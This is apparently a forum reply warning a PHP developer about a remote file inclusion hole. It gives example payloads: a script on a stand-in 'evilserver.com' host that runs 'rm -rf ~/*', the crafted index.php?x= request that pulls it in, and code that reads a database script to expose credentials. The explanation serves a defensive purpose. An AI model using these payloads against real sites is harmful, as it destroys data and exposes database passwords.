Yep. They can then also make a file http://www.evilserver.com/evilscript.php which outputs:
Code:
<?php
shell_exec('rm -rf ~/*');
?>
and go to index.php?x=http%3a%2f%2fwww.evilserver.com%2fevilscript.php to wipe out your whole site, or perhaps:
Code:
<?php
echo file_get_contents('script_that_uses_database.php');
?>
... to find out some juicy details about your database, like your username and password.
If you think this is a error please contact a admin.
It is an error. The title is "Error." If your users are pedantically-minded or not web-savvy enough to understand what you mean, you're likely to get a lot of emails...
Bookmarks